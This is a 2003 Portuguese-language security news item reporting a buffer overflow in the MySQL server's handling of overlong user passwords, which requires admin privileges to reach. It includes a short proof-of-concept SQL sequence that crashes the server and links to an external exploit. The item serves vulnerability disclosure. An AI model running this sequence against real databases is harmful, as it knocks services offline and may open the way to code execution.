Em memória de Giordani Rodrigues
Total Security - infoguerra.com.br
Bancos de Dados
Sábado - 15 de Novembro de 2003 às 18:26
Por: Whit3_Sh4rk

    Imprimir


Foi anunciada uma vulnerabilidade de buffer overflow no servidor MySQL que ocorre quando é inserido uma string de tamanho excessivo para a senha de um usuário.A versão apresenta-se devido a uma falta de verificação no limite apresentado quando se processa a senha do usuário no MySQL. Uma senha maior que 16 caracteres pode passar dos limites do buffer reservado na memória e corromper memórias adjacentes.

Um atacante com privilégio administrativo em um servidor MySQL afetado pode potencialmente explorar essa condição para suprir instruções arbitrárias executadas no contexto do servidor MySQL.

Exploit
A prova de que a vulnerabilidade existe está citada abaixo:

> USE mysql;
> ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
> UPDATE User SET Password =
"123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
12345678123456781234567812345678..." WHERE User = "abcd";
> FLUSH PRIVILEGES;

[Connection lost]

mysqld_safe/safe_mysqld log :

O exploit para está vulnerabilidade pode ser encontrado no site:
http://www.securiteam.com/exploits/5RP0B1FB5M.html

Fonte: Guerra Digital

Nota Total Security: Todas as versões do MySQL parecem ter esse problema. A única versão imune por enquanto é a 4.0.15




Comentários

Deixe seu Comentário

URL Fonte: http://infoguerra.com.br/noticia/162/visualizar/